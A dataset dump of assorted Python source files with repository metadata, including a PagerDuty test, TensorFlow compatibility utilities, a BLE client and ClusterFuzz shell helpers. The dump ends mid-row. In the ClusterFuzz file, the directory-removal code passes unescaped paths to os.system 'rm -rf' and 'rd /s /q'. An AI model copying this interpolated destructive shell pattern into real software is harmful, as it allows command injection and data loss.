| 56.666667 | 143 | 0.758824 |
ace8d632a8998c200d36aebb61f7a1f580e6ac99 | 894 | py | Python | tests/libs/pagerduty/pagerduty_tests.py | pythonghana/gatekeeper-service | e609e375f9cf80a1bc721c8b314c3b1c47831ad0 | [
"Apache-2.0"
] | 28 | 2018-06-22T17:43:40.000Z | 2022-03-11T03:10:20.000Z | tests/libs/pagerduty/pagerduty_tests.py | pythonghana/gatekeeper-service | e609e375f9cf80a1bc721c8b314c3b1c47831ad0 | [
"Apache-2.0"
] | 1 | 2022-03-21T00:59:32.000Z | 2022-03-21T00:59:32.000Z | tests/libs/pagerduty/pagerduty_tests.py | pythonghana/gatekeeper-service | e609e375f9cf80a1bc721c8b314c3b1c47831ad0 | [
"Apache-2.0"
] | 7 | 2018-06-22T18:02:37.000Z | 2022-03-21T00:59:21.000Z | import json
from unittest import TestCase
import os
from pagerduty import PagerDutyApi
from mock import patch, MagicMock
CALL_PAGERDUTY_API = "pagerduty.HttpController.api_request"
class PagerDutyApiTests(TestCase):
def read_resource_file(self, res_file):
mock_results_dir = "tests/libs/pagerduty/mock_results"
try:
mock_resource_file = os.path.join(mock_results_dir, res_file)
with open(mock_resource_file, "r") as fp:
self.mock_resource = json.loads(fp.read())
fp.close()
except IOError:
self.mock_resource = None
return self.mock_resource
@patch(CALL_PAGERDUTY_API)
def test_delete_user_pass(self, mock_pagerduty_api):
mock_pagerduty_api.return_value = ""
pagerduty_admin = PagerDutyApi(use_proxy=False, config=MagicMock())
delete_user = pagerduty_admin.delete_user(user_id="PP7WT8E")
assert delete_user == ""
| 27.090909 | 71 | 0.748322 |
ace8d6934e31b34aecd0fe8d90f4d17688cecc59 | 5,877 | py | Python | tensorflow/python/compat/compat.py | buchgr/tensorflow | 2938772a08ed02ced4663ca38168ab3f82e8f81b | [
"Apache-2.0"
] | null | null | null | tensorflow/python/compat/compat.py | buchgr/tensorflow | 2938772a08ed02ced4663ca38168ab3f82e8f81b | [
"Apache-2.0"
] | 2 | 2021-08-25T15:57:54.000Z | 2022-02-10T01:14:29.000Z | tensorflow/python/compat/compat.py | buchgr/tensorflow | 2938772a08ed02ced4663ca38168ab3f82e8f81b | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for API compatibility between TensorFlow release versions.
See [Version
Compatibility](https://tensorflow.org/guide/version_compat#backward_forward)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util.tf_export import tf_export
# This value changes every day with an automatic CL. It can be modified in code
# via `forward_compatibility_horizon()` or with the environment variable
# TF_FORWARD_COMPATIBILITY_DELTA_DAYS, which is added to the compatibility date.
_FORWARD_COMPATIBILITY_HORIZON = datetime.date(2020, 1, 27)
_FORWARD_COMPATIBILITY_DELTA_DAYS_VAR_NAME = "TF_FORWARD_COMPATIBILITY_DELTA_DAYS"
_FORWARD_COMPATIBILITY_DATE_NUMBER = None
def _date_to_date_number(year, month, day):
return (year << 9) | (month << 5) | day
def _update_forward_compatibility_date_number(date_to_override=None):
"""Update the base date to compare in forward_compatible function."""
global _FORWARD_COMPATIBILITY_DATE_NUMBER
if date_to_override:
date = date_to_override
else:
date = _FORWARD_COMPATIBILITY_HORIZON
delta_days = os.getenv(_FORWARD_COMPATIBILITY_DELTA_DAYS_VAR_NAME)
if delta_days:
date += datetime.timedelta(days=int(delta_days))
_FORWARD_COMPATIBILITY_DATE_NUMBER = _date_to_date_number(
date.year, date.month, date.day)
_update_forward_compatibility_date_number()
@tf_export("compat.forward_compatible")
def forward_compatible(year, month, day):
"""Return true if the forward compatibility window has expired.
See [Version
compatibility](https://tensorflow.org/guide/version_compat#backward_forward).
Forward-compatibility refers to scenarios where the producer of a TensorFlow
model (a GraphDef or SavedModel) is compiled against a version of the
TensorFlow library newer than what the consumer was compiled against. The
"producer" is typically a Python program that constructs and trains a model
while the "consumer" is typically another program that loads and serves the
model.
TensorFlow has been supporting a 3 week forward-compatibility window for
programs compiled from source at HEAD.
For example, consider the case where a new operation `MyNewAwesomeAdd` is
created with the intent of replacing the implementation of an existing Python
wrapper - `tf.add`. The Python wrapper implementation should change from
something like:
```python
def add(inputs, name=None):
return gen_math_ops.add(inputs, name)
```
to:
```python
from tensorflow.python.compat import compat
def add(inputs, name=None):
if compat.forward_compatible(year, month, day):
# Can use the awesome new implementation.
return gen_math_ops.my_new_awesome_add(inputs, name)
# To maintain forward compatibiltiy, use the old implementation.
return gen_math_ops.add(inputs, name)
```
Where `year`, `month`, and `day` specify the date beyond which binaries
that consume a model are expected to have been updated to include the
new operations. This date is typically at least 3 weeks beyond the date
the code that adds the new operation is committed.
Args:
year: A year (e.g., 2018). Must be an `int`.
month: A month (1 <= month <= 12) in year. Must be an `int`.
day: A day (1 <= day <= 31, or 30, or 29, or 28) in month. Must be an
`int`.
Returns:
True if the caller can expect that serialized TensorFlow graphs produced
can be consumed by programs that are compiled with the TensorFlow library
source code after (year, month, day).
"""
return _FORWARD_COMPATIBILITY_DATE_NUMBER > _date_to_date_number(
year, month, day)
@tf_export("compat.forward_compatibility_horizon")
@tf_contextlib.contextmanager
def forward_compatibility_horizon(year, month, day):
"""Context manager for testing forward compatibility of generated graphs.
See [Version
compatibility](https://tensorflow.org/guide/version_compat#backward_forward).
To ensure forward compatibility of generated graphs (see `forward_compatible`)
with older binaries, new features can be gated with:
```python
if compat.forward_compatible(year=2018, month=08, date=01):
generate_graph_with_new_features()
else:
generate_graph_so_older_binaries_can_consume_it()
```
However, when adding new features, one may want to unittest it before
the forward compatibility window expires. This context manager enables
such tests. For example:
```python
from tensorflow.python.compat import compat
def testMyNewFeature(self):
with compat.forward_compatibility_horizon(2018, 08, 02):
# Test that generate_graph_with_new_features() has an effect
```
Args:
year: A year (e.g., 2018). Must be an `int`.
month: A month (1 <= month <= 12) in year. Must be an `int`.
day: A day (1 <= day <= 31, or 30, or 29, or 28) in month. Must be an
`int`.
Yields:
Nothing.
"""
try:
_update_forward_compatibility_date_number(datetime.date(year, month, day))
yield
finally:
_update_forward_compatibility_date_number()
| 35.191617 | 82 | 0.74766 |
ace8d6baa6683578e1186a6d912bf29d087a0fd9 | 822 | py | Python | Templates_I/Templates_I/urls.py | BrianMarquez3/Python-Django | 61f84a01b7f57254f9dcbbad86cc4c88c2acf4d7 | [
"MIT"
] | 2 | 2020-09-28T21:23:59.000Z | 2021-11-10T15:01:15.000Z | Templates_I/Templates_I/urls.py | BrianMarquez3/Python-Django | 61f84a01b7f57254f9dcbbad86cc4c88c2acf4d7 | [
"MIT"
] | 21 | 2021-02-04T01:37:44.000Z | 2022-03-12T01:00:55.000Z | Templates_I/Templates_I/urls.py | BrianMarquez3/Python-Django | 61f84a01b7f57254f9dcbbad86cc4c88c2acf4d7 | [
"MIT"
] | null | null | null | """ORM_II URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from core.erp.views import myfirstView
urlpatterns = [
path('admin/', admin.site.urls),
path('prueba/', myfirstView),
]
| 32.88 | 77 | 0.710462 |
ace8d76a46cc7e4e07c5d7f3a8b9a7671ded3802 | 2,092 | py | Python | adaptiveleak/device/energy_client.py | tejaskannan/adaptive-sensor-security | 4c6dd1eb55eb30a8330c4bf3537e06c7d7802c0b | [
"Apache-2.0"
] | null | null | null | adaptiveleak/device/energy_client.py | tejaskannan/adaptive-sensor-security | 4c6dd1eb55eb30a8330c4bf3537e06c7d7802c0b | [
"Apache-2.0"
] | null | null | null | adaptiveleak/device/energy_client.py | tejaskannan/adaptive-sensor-security | 4c6dd1eb55eb30a8330c4bf3537e06c7d7802c0b | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
import sys
import time
from argparse import ArgumentParser
from functools import reduce
from typing import Optional, Iterable, List
from ble_manager import BLEManager
MAC_ADDRESS = '00:35:FF:13:A3:1E'
BLE_HANDLE = 18
HCI_DEVICE = 'hci0'
SLEEP = 2
sizes = [20, 40, 80, 120, 160, 200, 240, 280, 320, 360, 400, 440, 480, 520, 560, 600, 640, 680, 33, 479, 675, 886, 970]
def execute_client(num_bytes: int, num_trials: int):
"""
Starts the device client. This function connects with the devices (to reset the sleep mode), and then recieves
a single message when specified.
Args:
num_bytes: The number of bytes to receive
"""
assert num_bytes >= 1, 'Must provide a positive number of bytes'
byte_index = sizes.index(num_bytes)
# Initialize the device manager
device_manager = BLEManager(mac_addr=MAC_ADDRESS, handle=BLE_HANDLE, hci_device=HCI_DEVICE)
print('==========')
print('Starting experiment')
print('==========')
# Start and reset the device
try:
device_manager.start()
#device_manager.send_and_expect_byte(value=b'\xab', expected='\xcd')
finally:
device_manager.stop()
print('Press any key to start...')
x = input()
for _ in range(num_trials):
try:
device_manager.start()
size_index = (byte_index + 10).to_bytes(1, 'little')
response = device_manager.query(value=size_index)
#device_manager.send(value=b'\xab')
#data = num_bytes.to_bytes(2, 'big')
#response = device_manager.query(value=data)
print('Received response of {0} bytes (Target: {1})'.format(len(response), num_bytes))
finally:
device_manager.stop()
time.sleep(SLEEP)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--num-bytes', type=int, required=True)
parser.add_argument('--num-trials', type=int, required=True)
args = parser.parse_args()
execute_client(num_bytes=args.num_bytes, num_trials=args.num_trials)
| 29.055556 | 119 | 0.657266 |
ace8d7f2df31aa1cf437b40e7a9fa7b7e672fd73 | 18,300 | py | Python | src/python/system/shell.py | phwd/clusterfuzz | 420ef737056165184c165f81487212d2e752a71e | [
"Apache-2.0"
] | null | null | null | src/python/system/shell.py | phwd/clusterfuzz | 420ef737056165184c165f81487212d2e752a71e | [
"Apache-2.0"
] | null | null | null | src/python/system/shell.py | phwd/clusterfuzz | 420ef737056165184c165f81487212d2e752a71e | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shell related functions."""
from builtins import str
import os
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
from base import persistent_cache
from metrics import logs
from system import environment
try:
import psutil
except ImportError:
psutil = None
_DEFAULT_LOW_DISK_SPACE_THRESHOLD = 5 * 1024 * 1024 * 1024 # 5 GB.
_TRUSTED_HOST_LOW_DISK_SPACE_THRESHOLD = 2 * 1024 * 1024 # 2 GB.
FILE_COPY_BUFFER_SIZE = 10 * 1024 * 1024 # 10 MB.
HANDLE_OUTPUT_FILE_TYPE_REGEX = re.compile(
br'.*pid:\s*(\d+)\s*type:\s*File\s*([a-fA-F0-9]+):\s*(.*)')
_system_temp_dir = None
def _low_disk_space_threshold():
"""Get the low disk space threshold."""
if environment.is_trusted_host(ensure_connected=False):
# Trusted hosts can run with less free space as they do not store builds or
# corpora.
return _TRUSTED_HOST_LOW_DISK_SPACE_THRESHOLD
return _DEFAULT_LOW_DISK_SPACE_THRESHOLD
def copy_file(source_file_path, destination_file_path):
"""Faster version of shutil.copy with buffer size."""
if not os.path.exists(source_file_path):
logs.log_error('Source file %s for copy not found.' % source_file_path)
return False
error_occurred = False
try:
with open(source_file_path, 'rb') as source_file_handle:
with open(destination_file_path, 'wb') as destination_file_handle:
shutil.copyfileobj(source_file_handle, destination_file_handle,
FILE_COPY_BUFFER_SIZE)
except:
error_occurred = True
# Make sure that the destination file actually exists.
error_occurred |= not os.path.exists(destination_file_path)
if error_occurred:
logs.log_warn('Failed to copy source file %s to destination file %s.' %
(source_file_path, destination_file_path))
return False
return True
def clear_build_directory():
"""Clears the build directory."""
remove_directory(environment.get_value('BUILDS_DIR'), recreate=True)
def clear_build_urls_directory():
"""Clears the build url directory."""
remove_directory(environment.get_value('BUILD_URLS_DIR'), recreate=True)
if environment.is_trusted_host():
from bot.untrusted_runner import file_host
file_host.clear_build_urls_directory()
def clear_crash_stacktraces_directory():
"""Clears the crash stacktraces directory."""
remove_directory(
environment.get_value('CRASH_STACKTRACES_DIR'), recreate=True)
def clear_common_data_bundles_directory():
"""Clear the common data bundle directory."""
remove_directory(environment.get_value('FUZZ_DATA'), recreate=True)
def clear_data_bundles_directory():
"""Clears the data bundles directory."""
remove_directory(environment.get_value('DATA_BUNDLES_DIR'), recreate=True)
def clear_mutator_plugins_directory():
"""Clears the mutator plugins directory."""
remove_directory(environment.get_value('MUTATOR_PLUGINS_DIR'), recreate=True)
def clear_data_directories():
"""Clear all data directories."""
clear_build_directory()
clear_build_urls_directory()
clear_crash_stacktraces_directory()
clear_common_data_bundles_directory()
clear_data_bundles_directory()
clear_fuzzers_directories()
clear_temp_directory()
clear_testcase_directories()
clear_mutator_plugins_directory()
persistent_cache.clear_values(clear_all=True)
def clear_data_directories_on_low_disk_space():
"""Clear all data directories on low disk space. This should ideally never
happen, but when it does, we do this to keep the bot working in sane state."""
free_disk_space = get_free_disk_space()
if free_disk_space is None:
# Can't determine free disk space, bail out.
return
if free_disk_space >= _low_disk_space_threshold():
return
logs.log_warn(
'Low disk space detected, clearing all data directories to free up space.'
)
clear_data_directories()
def clear_device_temp_directories():
"""Clear device specific temp directories."""
if environment.platform() == 'ANDROID':
from platforms import android
android.device.clear_temp_directories()
def clear_fuzzers_directories():
"""Clears the fuzzers directory."""
remove_directory(environment.get_value('FUZZERS_DIR'), recreate=True)
def clear_temp_directory(clear_user_profile_directories=True):
"""Clear the temporary directories."""
temp_directory = environment.get_value('BOT_TMPDIR')
remove_directory(temp_directory, recreate=True)
test_temp_directory = environment.get_value('TEST_TMPDIR')
if test_temp_directory != temp_directory:
remove_directory(test_temp_directory, recreate=True)
if environment.is_trusted_host():
from bot.untrusted_runner import file_host
file_host.clear_temp_directory()
if not clear_user_profile_directories:
return
user_profile_root_directory = environment.get_value('USER_PROFILE_ROOT_DIR')
if not user_profile_root_directory:
return
remove_directory(user_profile_root_directory, recreate=True)
@environment.local_noop
def clear_system_temp_directory():
"""Clear system specific temp directory."""
def _delete_object(path, delete_func):
"""Delete a object with its delete function, ignoring any error."""
try:
delete_func(path)
except:
pass
if environment.get_value('SKIP_SYSTEM_TEMP_CLEANUP'):
# This provides a way to avoid clearing system temporary directory when it
# can interfere with other processes on the system.
return
# Cache system temp directory to avoid iterating through the system dir list
# on every gettempdir call. Also, it helps to avoid a case where temp dir
# fills up the disk and gets ignored by gettempdir.
global _system_temp_dir
if not _system_temp_dir:
_system_temp_dir = tempfile.gettempdir()
# Use a custom cleanup rather than using |remove_directory| since it
# recreates the directory and can mess up permissions and symlinks.
for root, dirs, files in walk(_system_temp_dir, topdown=False):
for name in files:
_delete_object(os.path.join(root, name), os.remove)
for name in dirs:
_delete_object(os.path.join(root, name), os.rmdir)
logs.log('Cleared system temp directory: %s' % _system_temp_dir)
def clear_testcase_directories():
"""Clears the testcase directories."""
remove_directory(environment.get_value('FUZZ_INPUTS'), recreate=True)
remove_directory(environment.get_value('FUZZ_INPUTS_DISK'), recreate=True)
if environment.platform() == 'ANDROID':
from platforms import android
android.device.clear_testcase_directory()
if environment.platform() == 'FUCHSIA':
from platforms import fuchsia
fuchsia.device.clear_testcase_directory()
if environment.is_trusted_host():
from bot.untrusted_runner import file_host
file_host.clear_testcase_directories()
def close_open_file_handles_if_needed(path):
"""Try to close all open file handle for a specific path."""
if environment.platform() != 'WINDOWS':
# Handle closing is only applicable on Windows platform.
return
resources_directory = environment.get_platform_resources_directory()
handle_executable_path = os.path.join(resources_directory, 'handle.exe')
handle_output = execute_command(
'%s -accepteula "%s"' % (handle_executable_path, path))
for line in handle_output.splitlines():
match = HANDLE_OUTPUT_FILE_TYPE_REGEX.match(line)
if not match:
continue
process_id = match.group(1).decode('utf-8')
file_handle_id = match.group(2).decode('utf-8')
file_path = match.group(3).decode('utf-8')
logs.log(
'Closing file handle id %s for path %s.' % (file_handle_id, file_path))
execute_command('%s -accepteula -c %s -p %s -y' %
(handle_executable_path, file_handle_id, process_id))
def create_directory(directory, create_intermediates=False, recreate=False):
"""Creates |directory|. Create intermediate directories if
|create_intermediates|. Ignore if it already exists and |recreate| is
False."""
if os.path.exists(directory):
if recreate:
remove_directory(directory)
else:
return True
try:
if create_intermediates:
os.makedirs(directory)
else:
os.mkdir(directory)
except:
logs.log_error('Unable to create directory %s.' % directory)
return False
return True
def execute_command(shell_command):
"""Run a command, returning its output."""
try:
process_handle = subprocess.Popen(
shell_command,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, _ = process_handle.communicate()
except:
logs.log_error('Error while executing command %s.' % shell_command)
return ''
return output
def get_command_and_arguments(command_line):
if environment.platform() == 'WINDOWS':
command = command_line
else:
command = shlex.split(command_line, posix=True)
return command, None
def get_command_line_from_argument_list(argument_list):
"""Convert a list of arguments to a string."""
return subprocess.list2cmdline(argument_list)
def get_directory_file_count(directory_path):
"""Returns number of files within a directory (recursively)."""
file_count = 0
for (root, _, files) in walk(directory_path):
for filename in files:
file_path = os.path.join(root, filename)
if not os.path.isfile(file_path):
continue
file_count += 1
return file_count
def get_directory_size(directory_path):
"""Returns size of a directory (in bytes)."""
directory_size = 0
for (root, _, files) in walk(directory_path):
for filename in files:
file_path = os.path.join(root, filename)
directory_size += os.path.getsize(file_path)
return directory_size
def get_files_list(directory_path):
"""Returns a list of files in a directory (recursively)."""
files_list = []
for (root, _, files) in walk(directory_path):
for filename in files:
file_path = os.path.join(root, filename)
if not os.path.isfile(file_path):
continue
files_list.append(file_path)
return files_list
def get_free_disk_space(path='/'):
"""Return free disk space."""
if not os.path.exists(path):
return None
return psutil.disk_usage(path).free
def get_interpreter(file_to_execute, is_blackbox_fuzzer=False):
"""Gives the interpreter needed to execute |file_to_execute|."""
interpreters = {
'.bash': 'bash',
'.class': 'java',
'.js': 'node',
'.pl': 'perl',
'.py': sys.executable,
'.pyc': sys.executable,
'.sh': 'sh'
}
try:
interpreter = interpreters[os.path.splitext(file_to_execute)[1]]
except KeyError:
return None
# TODO(mbarbella): Remove this when fuzzers have been migrated to Python 3.
if (is_blackbox_fuzzer and interpreter == sys.executable and
environment.get_value('USE_PYTHON2_FOR_BLACKBOX_FUZZERS') and
sys.version_info.major == 3):
interpreter = 'python2'
return interpreter
def get_execute_command(file_to_execute, is_blackbox_fuzzer=False):
"""Return command to execute |file_to_execute|."""
interpreter_path = get_interpreter(
file_to_execute, is_blackbox_fuzzer=is_blackbox_fuzzer)
# Hack for Java scripts.
file_to_execute = file_to_execute.replace('.class', '')
if interpreter_path:
command = '%s %s' % (interpreter_path, file_to_execute)
else:
# Handle executables that don't need an interpreter.
command = file_to_execute
return command
def move(src, dst):
"""Wrapper around shutil.move(src, dst). If shutil.move throws an shutil.Error
the exception is caught, an error is logged, and False is returned."""
try:
shutil.move(src, dst)
return True
except shutil.Error:
logs.log_error('Failed to move %s to %s' % (src, dst))
return False
def remove_empty_files(root_path):
"""Removes empty files in a path recursively"""
for directory, _, filenames in walk(root_path):
for filename in filenames:
path = os.path.join(directory, filename)
if os.path.getsize(path) > 0:
continue
try:
os.remove(path)
except:
logs.log_error('Unable to remove the empty file: %s (%s).' %
(path, sys.exc_info()[0]))
def remove_empty_directories(path):
"""Removes empty folder in a path recursively."""
if not os.path.isdir(path):
return
# Remove empty sub-folders.
files = os.listdir(path)
for filename in files:
absolute_path = os.path.join(path, filename)
if os.path.isdir(absolute_path):
remove_empty_directories(absolute_path)
# If folder is empty, delete it.
files = os.listdir(path)
if not files:
try:
os.rmdir(path)
except:
logs.log_error('Unable to remove empty folder %s.' % path)
def remove_file(file_path):
"""Removes a file, ignoring any error if it occurs."""
try:
if os.path.exists(file_path):
os.remove(file_path)
except:
pass
def remove_directory(directory, recreate=False, ignore_errors=False):
"""Removes a directory tree."""
# Log errors as warnings if |ignore_errors| is set.
log_error_func = logs.log_warn if ignore_errors else logs.log_error
def clear_read_only(func, path, _):
"""Clear the read-only bit and reattempt the removal again.
This is needed on Windows."""
try:
os.chmod(path, 0o750)
except:
# If this is tmpfs, we will probably fail.
pass
try:
func(path)
except:
# Log errors for all cases except device or resource busy errors, as such
# errors are expected in cases when mounts are used.
error_message = str(sys.exc_info()[1])
if 'Device or resource busy' not in error_message:
logs.log_warn(
'Failed to remove directory %s failed because %s with %s failed. %s'
% (directory, func, path, error_message))
# Try the os-specific deletion commands first. This helps to overcome issues
# with unicode filename handling.
if os.path.exists(directory):
if environment.platform() == 'WINDOWS':
os.system('rd /s /q "%s" > nul 2>&1' % directory)
else:
os.system('rm -rf "%s" > /dev/null 2>&1' % directory)
if os.path.exists(directory):
# If the directory still exists after using native OS delete commands, then
# try closing open file handles and then try removing it with read only
# bit removed (Windows only).
close_open_file_handles_if_needed(directory)
shutil.rmtree(directory, onerror=clear_read_only)
if os.path.exists(directory):
# 1. If directory is a mount point, then directory itself won't be
# removed. So, check the list of files inside it.
# 2. If directory is a regular directory, then it should have not
# existed.
if not os.path.ismount(directory) or os.listdir(directory):
# Directory could not be cleared. Bail out.
log_error_func('Failed to clear directory %s.' % directory)
return False
return True
if not recreate:
return True
try:
os.makedirs(directory)
except:
log_error_func('Unable to re-create directory %s.' % directory)
return False
return True
def walk(directory, **kwargs):
"""Wrapper around walk to resolve compatibility issues."""
return os.walk(directory, **kwargs)
# Copy of shutil.which from Python 3.3 (unavailable in Python 2.7).
# pylint: disable=bad-inline-option,g-inconsistent-quotes,redefined-builtin
# yapf: disable
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
Note: This function was backported from the Python 3 source code.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (
os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)
)
# If we're given a path with a directory part, look it up directly
# rather than referring to PATH directories. This includes checking
# relative to the current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if os.curdir not in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path
# extensions. This will allow us to short circuit when given
# "python.exe". If it does match, only test that one, otherwise we
# have to try others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
# pylint: enable=bad-inline-option,g-inconsistent-quotes,redefined-builtin
# yapf: enable
| 30.860034 | 80 | 0.714372 |
ace8da8ee7526a82f251ef81ddefde497d5b3fef | 3,204 | py | Python | tests/args-test.py | mbits-libs/libargs | 72f5f2b87ae39f26638a585fa4ad0b96b4152ae6 | [
"MIT"
] | null | null | null | tests/args-test.py | mbits-libs/libargs | 72f5f2b87ae39f26638a585fa4ad0b96b4152ae6 | [
"MIT"
] | 2 | 2020-09-25T10:07:38.000Z | 2020-10-11T16:01:17.000Z | tests/args-test.py | mbits-libs/libargs | 72f5f2b87ae39f26638a585fa4ad0b96b4152ae6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from __future__ import print_function
import os
import sys
import subprocess
if sys.stdout.isatty():
COLORS = dict(
list(zip([
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white',
],
list(range(30, 38))
))
)
COLORS['grey'] += 60
RESET = '\033[0m'
def colored(text, color=None):
fmt_str = '\033[%dm%s'
if color is not None:
text = fmt_str % (COLORS[color], text)
text += RESET
return text
else:
def colored(text, color=None):
return text
exe = sys.argv[1]
print(colored(exe, 'grey'))
exe = os.path.abspath(exe)
os.chdir(os.path.dirname(__file__))
def mktest(result, title, output):
return (int(result), title, output)
def tests():
p = subprocess.Popen([exe], stdout=subprocess.PIPE)
out, _ = p.communicate()
if p.returncode:
sys.exit(p.returncode)
out = out.decode('utf-8').replace('\r\n', '\n')
return [mktest(*line.split(':', 2)) for line in out.split('\n') if line]
def simplify(outdata):
return outdata.decode('UTF-8').replace('\r\n', '\\n').replace('\n', '\\n').replace('\t', '\\t')
tests_failed = 0
test_id = 0
tests = tests()
def print_result(test_type, val_exp, val_act, expected, actual, returncode=None, err=None, out=None):
global tests_failed
if val_exp == val_act:
return True
tests_failed += 1
print('''Expected equality of these values:
expected {type}
Which is: {expected}
actual {type}
Which is: {actual}'''.format(type=test_type, expected=expected, actual=actual))
return False
def print_result_simple(test_type, expected, actual):
return print_result(test_type, expected, actual, expected, actual)
index = -1
for result, title, output in tests:
index += 1
print(colored("[ RUN ]", "green"), colored(title, "grey"))
sys.stdout.flush()
p = subprocess.Popen([exe, "%s" % test_id],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
test_id += 1
out, err = p.communicate()
failed = p.returncode != 0
should_fail = result != 0
if not print_result('result', should_fail, failed, result, p.returncode, err, out):
if p.returncode:
print('stderr:')
print(err.decode('UTF-8'))
print()
else:
print('stdout:')
print(out.decode('UTF-8'))
print()
print(colored("[ FAILED ]", "red"), colored(title, "grey"))
elif output != '' and result == 0 and not print_result_simple('stdout', output, simplify(out)):
print(colored("[ FAILED ]", "red"), colored(title, "grey"))
elif output != '' and result != 0 and not print_result_simple('stderr', output, simplify(err)):
print(colored("[ FAILED ]", "red"), colored(
"{} [{}]".format(title, index), "grey"))
else:
print(colored("[ OK ]", "green"), colored(title, "grey"))
print(
"Result: {failed}/{total} failed".format(failed=tests_failed, total=len(tests)))
sys.exit(tests_failed)
| 26.04878 | 101 | 0.575843 |
ace8daabbbfae1b6ac6b03f1f72097f4c62cbfcd | 1,949 | py | Python | fn_qradar_integration/setup.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_qradar_integration/setup.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_qradar_integration/setup.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='fn_qradar_integration',
version='2.0.7',
license='MIT License',
author='IBM Resilient',
author_email='support@resilientsystems.com',
url='https://github.com/ibmresilient/resilient-community-apps/tree/master/fn_qradar_integration',
description="Resilient Circuits Components for 'fn_qradar_integration'",
long_description="fn_qradar_integration supports performing ariel search to retrieve data from QRadar. It also provide functions to find/add/delete reference set items.",
install_requires=[
'resilient_circuits>=30.0.0',
'resilient_lib'
],
packages=find_packages(),
include_package_data=True,
platforms='any',
classifiers=[
'Programming Language :: Python',
],
entry_points={
"resilient.circuits.components": [
"QradarFindReferenceSetsFunctionComponent = fn_qradar_integration.components.qradar_find_reference_sets:FunctionComponent",
"QradarDeleteReferenceSetItemFunctionComponent = fn_qradar_integration.components.qradar_delete_reference_set_item:FunctionComponent",
"QradarAddReferenceSetItemFunctionComponent = fn_qradar_integration.components.qradar_add_reference_set_item:FunctionComponent",
"QradarFindReferenceSetItemFunctionComponent = fn_qradar_integration.components.qradar_find_reference_set_item:FunctionComponent",
"QradarSearchFunctionComponent = fn_qradar_integration.components.qradar_search:FunctionComponent"
],
"resilient.circuits.configsection": ["gen_config = fn_qradar_integration.util.config:config_section_data"],
"resilient.circuits.customize": ["customize = fn_qradar_integration.util.customize:customization_data"],
"resilient.circuits.selftest": ["selftest = fn_qradar_integration.util.selftest:selftest_function"]
}
)
| 51.289474 | 174 | 0.757311 |
ace8db113329c8b809c24ce82803ae534ebc97c4 | 52,230 | py | Python | Lib/collections/__init__.py | tai271828/RustPython | 9fb70707c4803f9f6d79dd4c8077bd16f0a9be45 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-09-03T16:15:06.000Z | 2021-09-03T16:19:28.000Z | Lib/collections/__init__.py | tai271828/RustPython | 9fb70707c4803f9f6d79dd4c8077bd16f0a9be45 | [
"CC-BY-4.0",
"MIT"
] | 6 | 2021-10-01T13:51:43.000Z | 2021-11-17T13:27:14.000Z | Lib/collections/__init__.py | tai271828/RustPython | 9fb70707c4803f9f6d79dd4c8077bd16f0a9be45 | [
"CC-BY-4.0",
